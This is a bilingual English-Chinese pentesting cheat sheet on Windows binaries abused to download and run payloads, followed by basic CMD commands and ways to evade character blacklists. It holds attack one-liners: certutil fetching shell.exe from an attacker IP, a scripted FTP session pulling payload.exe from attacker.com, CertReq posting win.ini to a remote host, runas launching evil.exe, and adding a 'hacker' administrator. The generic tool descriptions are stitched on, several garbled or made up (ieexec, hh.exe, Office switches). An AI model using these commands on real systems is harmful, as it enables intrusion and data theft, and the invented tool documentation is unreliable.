To view the ARP table on a Windows system, you can use the arp command in the command prompt. Simply open the command prompt and type arp -a to display the ARP table. The output will show the IP addresses and corresponding MAC addresses of devices that the system has communicated with.

The ARP table is useful for troubleshooting network connectivity issues, identifying devices on the network, and detecting potential ARP spoofing attacks. By analyzing the ARP table, you can verify if the correct MAC address is associated with each IP address and identify any discrepancies or suspicious entries.

It's important to note that the ARP table is specific to each device and is not shared across the network. Therefore, each device maintains its own ARP table based on its network interactions.

arp -A

下载

Bitsadmin.exe

bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1

CertReq.exe

CertReq.exe is a command-line tool in Windows that is used to create and submit certificate requests to a certification authority (CA). It is commonly used by system administrators and security professionals for managing certificates in a Windows environment.

Syntax

The basic syntax for using CertReq.exe is as follows:

CertReq [options] [request_file] [output_file]

• options: Specifies various options for the certificate request.
• request_file: Specifies the input file that contains the certificate request information.
• output_file: Specifies the output file where the resulting certificate will be saved.

Examples

Here are some examples of how CertReq.exe can be used:

1. Generate a certificate request using a template:

CertReq -new -f template.inf -r -p "password" request.req

2. Submit a certificate request to a CA:

CertReq -submit -config "https://ca.example.com/certsrv" -attrib "CertificateTemplate:WebServer" request.req response.cer

3. Accept a certificate response and install the certificate:

CertReq -accept -machine response.cer

Conclusion

CertReq.exe is a powerful command-line tool for managing certificates in a Windows environment. It provides various options for creating and submitting certificate requests, as well as accepting and installing certificate responses. System administrators and security professionals can leverage CertReq.exe to streamline the certificate management process and ensure the security of their Windows systems.

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe 是一个 Windows 命令行实用程序，用于操作和管理证书、证书颁发机构 (CA) 和证书存储。它提供了许多功能，包括查看、导出、导入和验证证书，以及执行其他与证书相关的操作。以下是一些常用的 Certutil.exe 命令：

• certutil -viewstore：查看证书存储中的证书。
• certutil -addstore：将证书添加到证书存储。
• certutil -delstore：从证书存储中删除证书。
• certutil -exportPFX：将证书导出为 PFX 文件。
• certutil -importPFX：从 PFX 文件导入证书。
• certutil -verify：验证证书的有效性。
• certutil -dump：显示证书的详细信息。

要了解更多 Certutil.exe 命令和用法，请参考 Microsoft 官方文档。

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Basic CMD for Pentesters

Introduction

This document provides a list of basic CMD commands that can be useful for pentesters during their engagements. These commands can help in various tasks such as information gathering, privilege escalation, lateral movement, and persistence.

CMD Commands

1. Tasklist

The tasklist command displays a list of all running processes on the system. This can be useful for identifying suspicious or malicious processes.

tasklist

2. Netstat

The netstat command displays active network connections, listening ports, and related information. It can help identify open ports and established connections.

netstat -ano

3. Ipconfig

The ipconfig command displays the IP configuration for all network interfaces on the system. It can be used to identify the IP address, subnet mask, and default gateway.

ipconfig /all

4. Net

The net command is used for various network-related tasks. Some useful subcommands include:

• net user - Displays user accounts on the system.
• net group - Displays group information.
• net localgroup - Displays local group information.
• net share - Displays shared resources.

net user

5. Systeminfo

The systeminfo command displays detailed information about the system, including the operating system version, hardware information, and installed patches.

systeminfo

6. Reg

The reg command is used to manage the Windows Registry. Some useful subcommands include:

• reg query - Displays the values and subkeys of a specified registry key.
• reg add - Adds a new registry entry.
• reg delete - Deletes a registry entry.
• reg export - Exports a registry key to a file.

reg query HKLM\Software

7. Schtasks

The schtasks command is used to manage scheduled tasks on the system. It can be used to create, modify, or delete scheduled tasks.

schtasks /query /fo LIST

8. Netsh

The netsh command is used to configure and monitor network settings. Some useful subcommands include:

• netsh firewall - Manages the Windows Firewall.
• netsh wlan - Manages wireless network settings.
• netsh interface - Manages network interfaces.

netsh firewall show state

9. WMIC

The wmic command provides a command-line interface to the Windows Management Instrumentation (WMI) infrastructure. It can be used to retrieve information about various system components.

wmic process get name, processid

10. Taskkill

The taskkill command is used to terminate a running process. It can be used to forcefully terminate a process that is not responding or is malicious.

taskkill /f /pid <process_id>

Conclusion

These basic CMD commands can be helpful for pentesters during their engagements. However, it is important to note that these commands should be used responsibly and ethically, following all applicable laws and regulations.

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

Esentutl.exe 是一个用于管理和维护 Windows 操作系统中的 Extensible Storage Engine (ESE) 数据库的命令行工具。ESE 是一种嵌入式数据库引擎，广泛用于 Windows 系统中的许多应用程序，如 Active Directory、Windows Update 和 Windows Search。

基本用法

以下是 Esentutl.exe 的一些常用命令和用法：

检查数据库状态

esentutl /mh <database_file>

此命令用于检查指定数据库文件的状态，包括数据库的版本、日志文件的状态以及数据库的一致性。

修复数据库

esentutl /p <database_file>

此命令用于修复指定的数据库文件。修复过程将尝试恢复损坏的数据库文件，并将其置于一致的状态。

恢复数据库

esentutl /r <log_file> /l <log_folder> /d <database_folder> /i

此命令用于从日志文件和数据库文件的备份中恢复数据库。需要指定日志文件、日志文件夹和数据库文件夹的路径。

备份数据库

esentutl /y <database_file> /d <backup_folder>

此命令用于创建数据库文件的备份。需要指定数据库文件和备份文件夹的路径。

注意事项

• 在使用 Esentutl.exe 之前，请确保已经备份了相关的数据库文件和日志文件。
• 在执行修复和恢复操作之前，建议先停止与数据库相关的服务和应用程序。
• 使用 Esentutl.exe 进行数据库操作需要管理员权限。

更多关于 Esentutl.exe 的详细信息，请参考官方文档。

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

Expand.exe 是一个 Windows 命令行实用程序，用于解压缩文件。它可以将压缩文件（如 .cab 文件）解压缩到指定的目录中。

语法

expand.exe [-r] source destination

参数

• -r：可选参数，用于递归地解压缩源文件夹中的所有文件。

• source：要解压缩的文件路径。

• destination：解压缩文件的目标路径。

示例

expand.exe -r C:\archive.cab C:\extracted_files

以上示例将递归地解压缩 C:\archive.cab 文件中的所有文件，并将其解压缩到 C:\extracted_files 目录中。

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extrac32.exe

Extrac32.exe 是 Windows 操作系统中的一个命令行实用程序，用于解压缩文件。它可以解压缩 .cab 文件，这是一种常见的压缩文件格式。

语法

extrac32 [/Y] [/A] [/D] [/L] [/Q] [/R] [/T:folder] [/X] [/Z] source destination

参数

• /Y：在解压缩时不提示确认。
• /A：将文件解压缩到指定的文件夹中。
• /D：在解压缩时显示详细的进度信息。
• /L：将文件解压缩到指定的文件夹中，但不创建文件夹。
• /Q：在解压缩时不显示任何信息。
• /R：在解压缩时覆盖现有的文件。
• /T:folder：将文件解压缩到指定的文件夹中。
• /X：在解压缩时不保留源文件的路径。
• /Z：在解压缩时显示详细的进度信息。

示例

extrac32 /Y /A /D /R /T:C:\temp /Z C:\archive.cab C:\destination

此命令将解压缩 C:\archive.cab 文件到 C:\destination 文件夹中，并覆盖现有的文件。解压缩过程中将显示详细的进度信息，并将源文件解压缩到 C:\temp 文件夹中。

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr.exe 是 Windows 操作系统中的一个命令行工具，用于在文件中搜索指定的字符串。它可以用于查找文本文件中的特定内容，也可以用于在多个文件中搜索匹配的字符串。

语法

findstr [/b] [/e] [/l] [/r] [/s] [/i] [/x] [/v] [/n] [/m] [/o] [/p] [/g:File] [/f:File] [/c:String] [/d:DirList] [/a:ColorAttribute] [Strings] [[Drive:][Path] FileName[ ...]]

参数

• /b：匹配以指定字符串开头的行。
• /e：匹配以指定字符串结尾的行。
• /l：将搜索模式视为字面值，而不是正则表达式。
• /r：使用正则表达式搜索模式。
• /s：在指定目录及其子目录中递归搜索。
• /i：忽略大小写进行匹配。
• /x：仅匹配整个行，而不是部分匹配。
• /v：仅显示不匹配的行。
• /n：在每行前显示行号。
• /m：仅显示包含匹配项的文件名。
• /o：在每个匹配项前显示偏移量。
• /p：仅显示包含匹配项的文件名，而不显示匹配的行。
• /g:File：从指定的文件中获取搜索字符串。
• /f:File：从指定的文件中获取搜索文件列表。
• /c:String：指定要搜索的字符串。
• /d:DirList：在指定的目录列表中搜索。
• /a:ColorAttribute：指定输出文本的颜色属性。

示例

• 在文件中搜索包含指定字符串的行：

findstr "search_string" filename.txt

• 在多个文件中搜索包含指定字符串的行：

findstr "search_string" file1.txt file2.txt file3.txt

• 在指定目录及其子目录中递归搜索包含指定字符串的行：

findstr /s "search_string" C:\path\to\directory

• 使用正则表达式搜索模式：

findstr /r "regex_pattern" filename.txt

• 从文件中获取搜索字符串：

findstr /g:search_strings.txt filename.txt

• 从文件中获取搜索文件列表：

findstr /f:file_list.txt "search_string"

• 忽略大小写进行匹配：

findstr /i "search_string" filename.txt

• 仅匹配以指定字符串开头的行：

findstr /b "search_string" filename.txt

• 仅匹配以指定字符串结尾的行：

findstr /e "search_string" filename.txt

• 仅显示不匹配的行：

findstr /v "search_string" filename.txt

• 在每行前显示行号：

findstr /n "search_string" filename.txt

• 仅显示包含匹配项的文件名：

findstr /m "search_string" filename.txt

• 在每个匹配项前显示偏移量：

findstr /o "search_string" filename.txt

• 仅显示包含匹配项的文件名，而不显示匹配的行：

findstr /p "search_string" filename.txt

• 指定输出文本的颜色属性：

findstr /a:ColorAttribute "search_string" filename.txt

注意事项

• findstr.exe 默认情况下区分大小写，如果需要忽略大小写进行匹配，可以使用 /i 参数。
• findstr.exe 支持使用正则表达式进行搜索，可以使用 /r 参数。
• findstr.exe 可以在文本文件中搜索指定的字符串，也可以在多个文件中搜索匹配的字符串。
• findstr.exe 可以递归搜索指定目录及其子目录中的文件。
• findstr.exe 可以从文件中获取搜索字符串或搜索文件列表。
• findstr.exe 可以根据需要显示不匹配的行、行号、文件名等信息。

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

ftp.exe is a command-line utility in Windows that allows users to transfer files to and from a remote computer using the File Transfer Protocol (FTP). It is a built-in tool that comes with the Windows operating system.

Syntax

The basic syntax for using ftp.exe is as follows:

ftp [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

Options

Here are some commonly used options with ftp.exe:

• -v: Enables verbose mode, which displays detailed information about the FTP connection and file transfers.
• -d: Enables debugging mode, which provides additional information for troubleshooting purposes.
• -i: Disables interactive mode, which suppresses prompts for user confirmation during file transfers.
• -n: Suppresses the automatic login feature, allowing the user to manually log in to the FTP server.
• -g: Disables filename globbing, which prevents wildcard characters from being expanded in file names.
• -s:filename: Specifies a text file containing FTP commands to be executed automatically.
• -a: Uses ASCII mode for file transfers, which is suitable for transferring text files.
• -w:windowsize: Specifies the size of the receive window for data transfers.
• -A: Enables anonymous FTP login, allowing users to log in without providing a username or password.

Examples

Here are some examples of how to use ftp.exe:

1. Connect to an FTP server:

ftp example.com

2. Upload a file to the FTP server:

put filename

3. Download a file from the FTP server:

get filename

4. List files and directories on the FTP server:

ls

5. Change the current directory on the FTP server:

cd directory

6. Disconnect from the FTP server:

bye

Conclusion

ftp.exe is a useful command-line tool for transferring files to and from remote computers using FTP. By understanding its syntax and options, you can effectively use this utility for various file transfer operations.

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

hh.exe is a Windows executable that is used to launch the Windows Help and Support Center. It is commonly found in the C:\Windows directory.

Usage

To launch the Help and Support Center using hh.exe, open a command prompt and run the following command:

hh.exe helpctr

This will open the Help and Support Center window, where you can search for help topics and access various Windows support resources.

Command-Line Options

hh.exe supports several command-line options that can be used to customize its behavior. Here are some commonly used options:

• /mapid <mapid>: Opens the specified Help topic directly.
• /url <URL>: Opens the specified URL in the default browser.
• /find <text>: Searches for the specified text in the Help content.
• /index <keyword>: Displays the Help topics that match the specified keyword.
• /show <window>: Displays the specified window in the Help and Support Center.

For example, to open a specific Help topic with the map ID 1234, you can use the following command:

hh.exe helpctr /mapid 1234

Security Considerations

hh.exe is a legitimate Windows executable and is not inherently malicious. However, like any other executable, it can be abused by attackers to execute arbitrary commands or launch malicious payloads.

To mitigate the risk of abuse, it is important to ensure that hh.exe is only executed from trusted locations and that the command-line options are properly validated. Additionally, keeping the operating system and software up to date with the latest security patches can help prevent potential vulnerabilities from being exploited.

References

• Microsoft Docs: Hh.exe Command-Line Options

HH.exe http://some.url/script.ps1

Ieexec.exe

ieexec.exe is a command-line utility in Windows that allows you to execute Internet Explorer processes with specific options. It is commonly used by pentesters and hackers to perform various tasks related to web browsing and exploitation.

Usage

The basic syntax of ieexec.exe is as follows:

ieexec.exe [options] [URL]

• [options]: Specifies the command-line options for ieexec.exe. These options can be used to control the behavior of Internet Explorer processes.
• [URL]: Specifies the URL of the website to be opened in Internet Explorer.

Examples

Here are some examples of how ieexec.exe can be used:

1. Open a website in Internet Explorer:

   ieexec.exe https://example.com
   

2. Open a website in Internet Explorer with specific options:

   ieexec.exe --new-window --no-proxy-server https://example.com
   

3. Execute JavaScript code in Internet Explorer:

   ieexec.exe --script "alert('Hello, world!');"
   

4. Take a screenshot of a website in Internet Explorer:

   ieexec.exe --screenshot screenshot.png https://example.com
   

Conclusion

ieexec.exe is a useful tool for pentesters and hackers who need to interact with Internet Explorer processes from the command line. It provides various options for controlling the behavior of Internet Explorer and performing tasks such as opening websites, executing JavaScript code, and taking screenshots.

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

Makecab.exe is a command-line tool in Windows that is used to create cabinet (.cab) files. Cabinet files are compressed archives that can contain multiple files and folders. This tool is commonly used for packaging and compressing files for distribution or installation purposes.

Syntax

makecab [/V[n]] [/D var=value ...] [/L dir] source [destination]

Parameters

• /V[n]: Specifies the verbosity level of the output. Use /V for normal output and /Vn for more verbose output (where n is a number from 1 to 3).
• /D var=value: Defines a variable and its value for use in the makecab directive section.
• /L dir: Specifies the directory where the output files will be placed.
• source: Specifies the file or files to be compressed.
• destination: Specifies the name of the cabinet file to be created.

Examples

1. Compress a single file:

makecab file.txt

2. Compress multiple files:

makecab file1.txt file2.txt file3.txt

3. Specify the output directory:

makecab /L C:\Output file.txt

4. Set verbosity level to 2:

makecab /V2 file.txt

Additional Information

• The makecab directive section allows you to specify additional instructions for the compression process, such as file attributes, disk names, and more.
• Cabinet files can be extracted using the expand command or by double-clicking on them in Windows Explorer.

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe 是 Windows Defender 的命令行实用程序。它允许用户在命令行界面下执行与 Windows Defender 相关的操作，如扫描文件、更新病毒定义和配置 Windows Defender 设置等。以下是一些常用的 MpCmdRun.exe 命令：

• 扫描文件或文件夹：MpCmdRun.exe -Scan -ScanType 3 -File <路径>
• 扫描全盘：MpCmdRun.exe -Scan -ScanType 2
• 更新病毒定义：MpCmdRun.exe -SignatureUpdate
• 查看病毒扫描日志：MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <日志文件路径>
• 禁用实时保护：MpCmdRun.exe -DisableRealtimeMonitoring
• 启用实时保护：MpCmdRun.exe -EnableRealtimeMonitoring
• 查看 Windows Defender 设置：MpCmdRun.exe -GetFiles -ScanType 3 -LogFile <日志文件路径>

请注意，执行 MpCmdRun.exe 命令需要管理员权限。

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

Replace.exe is a command-line tool in Windows that allows you to replace files in a specified directory. It can be useful for various purposes, including replacing system files, modifying configurations, or performing other file-related operations.

Syntax

The syntax for using Replace.exe is as follows:

replace.exe <source_file> <destination_file> [/A] [/P] [/R] [/W]

• <source_file>: Specifies the file to be copied.
• <destination_file>: Specifies the location and name of the new file.
• /A: Adds the file attributes of the source file to the destination file.
• /P: Prompts for confirmation before replacing an existing file.
• /R: Replaces read-only files.
• /W: Waits for you to insert a disk before replacing files.

Examples

Here are some examples of how to use Replace.exe:

1. Replace a file without prompting for confirmation:

replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /P

2. Replace a file and add the file attributes of the source file to the destination file:

replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /A

3. Replace a read-only file:

replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /R

4. Replace a file and wait for disk insertion:

replace.exe C:\path\to\source\file.txt C:\path\to\destination\file.txt /W

Note: Make sure to replace C:\path\to\source\file.txt with the actual path and name of the source file, and C:\path\to\destination\file.txt with the actual path and name of the destination file.

Conclusion

Replace.exe is a powerful command-line tool in Windows that allows you to replace files in a specified directory. By understanding its syntax and options, you can efficiently perform file replacement operations as needed.

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Basic CMD for Pentesters

Introduction

This document provides a list of basic CMD commands that can be useful for pentesters during their engagements. These commands can help in gathering information, performing reconnaissance, and executing various tasks on a Windows system.

CMD Commands

1. Tasklist

The tasklist command displays a list of all running processes on the system. This can be useful for identifying any suspicious or malicious processes.

tasklist

2. Netstat

The netstat command displays active network connections, listening ports, and related information. It can help in identifying any unauthorized network connections or open ports.

netstat -ano

3. Ipconfig

The ipconfig command displays the IP configuration of all network interfaces on the system. It can be used to gather information about the network settings of the target system.

ipconfig /all

4. Net

The net command is used for various network-related operations. Some useful subcommands include:

• net user - Displays information about user accounts on the system.
• net group - Displays information about user groups on the system.
• net localgroup - Displays information about local groups on the system.

net user
net group
net localgroup

5. Systeminfo

The systeminfo command displays detailed information about the system, including the operating system version, hardware configuration, and installed software. This can be useful for identifying vulnerabilities or outdated software.

systeminfo

6. Reg

The reg command is used to manage the Windows Registry. Some useful subcommands include:

• reg query - Displays the values and subkeys of a specified registry key.
• reg add - Adds a new registry key or value.
• reg delete - Deletes a specified registry key or value.

reg query HKLM\Software
reg add HKCU\Software\NewKey
reg delete HKLM\Software\OldKey

7. Taskkill

The taskkill command is used to terminate a running process. It can be useful for stopping any malicious processes or unwanted applications.

taskkill /IM process_name.exe /F

8. Schtasks

The schtasks command is used to manage scheduled tasks on the system. It can be used to create, modify, or delete scheduled tasks.

schtasks /Create /SC DAILY /TN "TaskName" /TR "C:\path\to\executable.exe" /ST 12:00
schtasks /Change /TN "TaskName" /RU "SYSTEM"
schtasks /Delete /TN "TaskName"

9. Cipher

The cipher command is used to manage file encryption on NTFS volumes. It can be used to encrypt or decrypt files and folders.

cipher /E /S:C:\path\to\folder
cipher /D /S:C:\path\to\folder

10. Eventvwr

The eventvwr command opens the Event Viewer, which displays logs and events recorded by the system. It can be used to analyze system events and identify any suspicious activities.

eventvwr

Conclusion

These basic CMD commands can be helpful for pentesters during their engagements. However, it is important to note that these commands should be used responsibly and in accordance with legal and ethical guidelines.

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe is the executable file for Microsoft PowerPoint, a popular presentation software. It is commonly found on Windows operating systems.

Usage

To launch PowerPoint using the command prompt, you can use the following command:

powerpnt.exe

This will open the PowerPoint application, allowing you to create, edit, and present slideshows.

Command Line Options

Powerpnt.exe supports various command line options that can be used to perform specific tasks. Here are some commonly used options:

• /s - Starts PowerPoint in slideshow mode.
• /n - Starts a new instance of PowerPoint.
• /f <filename> - Opens the specified file in PowerPoint.
• /m <macro> - Runs the specified macro when PowerPoint starts.
• /pt <printername> - Prints the specified file to the specified printer.
• /p <filename> - Prints the specified file without opening PowerPoint.

Example

To open a PowerPoint file named "presentation.pptx" using the command prompt, you can use the following command:

powerpnt.exe /f presentation.pptx

This will open the "presentation.pptx" file in PowerPoint.

Conclusion

Powerpnt.exe is a useful tool for working with PowerPoint files from the command line. By understanding its command line options, you can automate tasks and perform operations more efficiently.

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

Squirrel.exe is a command-line utility that allows you to interact with the Squirrel framework. It is commonly used by developers to manage and deploy applications built with Squirrel.

Usage

To use Squirrel.exe, open a command prompt and navigate to the directory where the executable is located. Then, you can run various commands to perform different actions.

Install

The install command is used to install an application. It takes the path to the application package as an argument.

squirrel.exe install <path_to_package>

Update

The update command is used to update an installed application. It takes the path to the updated application package as an argument.

squirrel.exe update <path_to_package>

Uninstall

The uninstall command is used to uninstall an application. It takes the application name as an argument.

squirrel.exe uninstall <application_name>

Other Commands

Squirrel.exe also provides other commands for managing applications, such as list, releasify, and clean. You can use the --help flag with any command to get more information about its usage.

Conclusion

Squirrel.exe is a powerful command-line utility for managing applications built with the Squirrel framework. By using the various commands provided, you can easily install, update, and uninstall applications, making it a valuable tool for developers.

squirrel.exe --download [url to package]

Update.exe

Update.exe is a common executable file found in Windows operating systems. It is used to update various software and system components. However, it can also be leveraged by attackers for malicious purposes.

Malicious Use

Attackers can disguise malware or malicious scripts as Update.exe to trick users into running them. This can be done through various methods, such as phishing emails, compromised websites, or social engineering techniques.

Once executed, the malicious Update.exe can perform a wide range of actions, including:

• Installing additional malware or backdoors on the system.
• Modifying system settings or configurations.
• Stealing sensitive information, such as login credentials or personal data.
• Initiating unauthorized network connections.
• Exploiting vulnerabilities in the system or other software.

Prevention and Mitigation

To protect against malicious Update.exe files, consider the following preventive measures:

1. Exercise caution: Be wary of downloading or running any files named Update.exe from untrusted sources.
2. Keep software up to date: Regularly update your operating system and software applications to patch any vulnerabilities that could be exploited by attackers.
3. Use reliable security software: Install and maintain reputable antivirus and anti-malware software to detect and block malicious files.
4. Enable firewalls: Enable and configure firewalls to monitor and control incoming and outgoing network traffic.
5. Educate users: Train users to be cautious when downloading files or clicking on links, especially from unknown or suspicious sources.

By following these preventive measures, you can reduce the risk of falling victim to malicious Update.exe files and protect your system from potential attacks.

Update.exe --download [url to package]

Basic CMD for Pentesters

Winword.exe

winword.exe is the executable file for Microsoft Word, a popular word processing program. It is commonly found on Windows operating systems.

Execution

To execute winword.exe, you can simply type winword in the command prompt and press Enter. This will launch the Microsoft Word application.

winword

Command Line Arguments

winword.exe supports various command line arguments that can be used to perform specific actions or tasks. Here are some commonly used arguments:

• /n - Opens a new instance of Microsoft Word.
• /t - Opens a specified file.
• /m - Executes a specific macro or command.
• /q - Starts Word without displaying the splash screen.

To use these arguments, you can append them to the winword command. For example, to open a specific file, you can use the /t argument followed by the file path:

winword /t C:\path\to\file.docx

Additional Information

• winword.exe is typically located in the C:\Program Files\Microsoft Office\root\OfficeXX directory, where XX represents the version number of Microsoft Office installed on the system.
• It is important to note that winword.exe can be used as a vector for malicious activities, such as executing macros or launching exploits. Therefore, it is crucial to ensure the security of Microsoft Word and its associated files.

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe 是 Windows Subsystem for Linux (WSL) 的可执行文件。WSL 是一种允许在 Windows 操作系统上运行 Linux 发行版的兼容层。通过运行 wsl.exe，用户可以在 Windows 环境中访问和使用 Linux 命令行工具和应用程序。

用法

要在 Windows 上运行 WSL，请按下 Win + R 组合键打开运行对话框，然后输入 wsl 并按下回车键。这将启动默认的 Linux 发行版。

如果你想运行特定的 Linux 发行版，可以使用以下命令：

wsl -d <distribution>

其中 <distribution> 是你想要运行的 Linux 发行版的名称。

示例

以下是一些使用 wsl.exe 的示例：

• 运行默认的 Linux 发行版：

  wsl
  

• 运行 Ubuntu 发行版：

  wsl -d Ubuntu
  

• 运行 Kali Linux 发行版：

  wsl -d Kali
  

请注意，wsl.exe 只能在支持 WSL 的 Windows 版本上运行。

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

其他

Basic CMD commands for pentesters

渗透测试人员的基本CMD命令

Here you have a list of basic CMD commands that can be useful during a penetration test.

这里有一些在渗透测试过程中可能有用的基本CMD命令列表。

Networking

网络

ipconfig

ipconfig

Displays the IP configuration for all network interfaces on the machine.

显示机器上所有网络接口的IP配置。

ipconfig

netstat

netstat

Displays active network connections and listening ports.

显示活动的网络连接和监听端口。

netstat -ano

nslookup

nslookup

Performs DNS lookup on a specified domain or IP address.

对指定的域名或IP地址执行DNS查找。

nslookup google.com

ping

ping

Sends ICMP Echo Request packets to a specified IP address or domain.

向指定的IP地址或域名发送ICMP Echo请求数据包。

ping google.com

tracert

tracert

Traces the route that packets take to reach a specified IP address or domain.

跟踪数据包到达指定的IP地址或域名的路径。

tracert google.com

System Information

系统信息

systeminfo

systeminfo

Displays detailed configuration information about the machine's hardware and software.

显示有关机器硬件和软件的详细配置信息。

systeminfo

tasklist

tasklist

Displays a list of currently running processes on the machine.

显示机器上当前正在运行的进程列表。

tasklist

net user

net user

Displays a list of user accounts on the machine.

显示机器上的用户账户列表。

net user

net localgroup

net localgroup

Displays a list of local groups on the machine.

显示机器上的本地组列表。

net localgroup

File and Directory Operations

文件和目录操作

dir

dir

Lists the files and directories in the current directory.

列出当前目录中的文件和目录。

dir

cd

cd

Changes the current directory.

更改当前目录。

cd C:\Windows

copy

copy

Copies one or more files from one location to another.

从一个位置复制一个或多个文件到另一个位置。

copy file.txt C:\Temp

move

move

Moves one or more files from one location to another.

从一个位置移动一个或多个文件到另一个位置。

move file.txt C:\Temp

del

del

Deletes one or more files.

删除一个或多个文件。

del file.txt

User and Group Management

用户和组管理

net user

net user

Creates, modifies, or deletes user accounts.

创建、修改或删除用户账户。

net user hacker password123 /add

net localgroup

net localgroup

Creates, modifies, or deletes local groups.

创建、修改或删除本地组。

net localgroup administrators hacker /add

net group

net group

Displays or modifies global groups.

显示或修改全局组。

net group administrators

Service Management

服务管理

sc

sc

Manages services on the machine.

管理机器上的服务。

sc query

sc start servicename

sc stop servicename

Registry Operations

注册表操作

reg query

reg query

Displays the values and subkeys of a specified registry key.

显示指定注册表键的值和子键。

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

reg add

reg add

Adds a new registry key or modifies an existing registry key.

添加新的注册表键或修改现有的注册表键。

reg add HKEY_LOCAL_MACHINE\Software\NewKey

reg delete

reg delete

Deletes a registry key and its subkeys.

删除注册表键及其子键。

reg delete HKEY_LOCAL_MACHINE\Software\NewKey

Task Scheduler

任务计划程序

schtasks

schtasks

Manages scheduled tasks on the machine.

管理机器上的计划任务。

schtasks /query

schtasks /create /tn "TaskName" /tr "C:\Temp\script.bat" /sc DAILY /st 12:00

schtasks /delete /tn "TaskName"

Event Viewer

事件查看器

eventvwr

eventvwr

Opens the Event Viewer, which displays detailed information about system events.

打开事件查看器，显示有关系统事件的详细信息。

eventvwr

Conclusion

结论

These are just a few of the many CMD commands available for Windows. Understanding and utilizing these commands can greatly enhance your effectiveness as a pentester.

这些只是Windows上众多CMD命令中的一部分。理解和利用这些命令可以极大地提高您作为渗透测试人员的效率。

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type <file> #Cat file

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden

#Give full control over a file that you owns
icacls <FILE_PATH> /t /e /p <USERNAME>:F
icacls <FILE_PATH> /e /r <USERNAME> #Remove the permision

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat to transform exe file in bat file

#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)

# Get error messages from code
net helpmsg 32 #32 is the code in that case

绕过字符黑名单

In some cases, when attempting to execute commands on a target system, certain characters may be blacklisted or filtered out. This can make it difficult to execute commands that contain these restricted characters. However, there are several techniques that can be used to bypass character blacklisting and successfully execute commands.

在某些情况下，在尝试在目标系统上执行命令时，某些字符可能会被列入黑名单或过滤掉。这可能会使包含这些受限字符的命令难以执行。然而，有几种技术可以用来绕过字符黑名单并成功执行命令。

1. Character Substitution

One method to bypass character blacklisting is to substitute restricted characters with similar-looking characters that are not blacklisted. For example, if the character ; is blacklisted, it can be replaced with a similar-looking character like ; (Greek question mark). This can trick the system into accepting the command without triggering the blacklist.

1. 字符替换

绕过字符黑名单的一种方法是用看起来相似但不在黑名单中的字符替换受限字符。例如，如果字符 ; 被列入黑名单，可以用类似的字符 ;（希腊问号）替换它。这可以欺骗系统接受命令而不触发黑名单。

2. Unicode Encoding

Another technique is to use Unicode encoding to represent restricted characters. This involves converting the restricted character into its Unicode representation and using that in the command. For example, the character ; can be represented as %u003B in Unicode. This can bypass the blacklist as the system may not recognize the Unicode representation as the restricted character.

2. Unicode 编码

另一种技术是使用 Unicode 编码来表示受限字符。这涉及将受限字符转换为其 Unicode 表示，并在命令中使用该表示。例如，字符 ; 可以用 Unicode 表示为 %u003B。这可以绕过黑名单，因为系统可能无法将 Unicode 表示识别为受限字符。

3. Command Concatenation

If certain characters are blacklisted individually but allowed when combined with other characters, command concatenation can be used. This involves breaking the command into multiple parts and concatenating them using allowed characters. For example, if the characters & and ; are blacklisted individually, but allowed when combined as &;, the command can be split into two parts and concatenated using &; to bypass the blacklist.

3. 命令连接

如果某些字符在单独使用时被列入黑名单，但与其他字符组合时允许使用，可以使用命令连接。这涉及将命令分成多个部分，并使用允许的字符进行连接。例如，如果字符 & 和 ; 在单独使用时被列入黑名单，但在组合为 &; 时允许使用，可以将命令分成两部分，并使用 &; 进行连接以绕过黑名单。

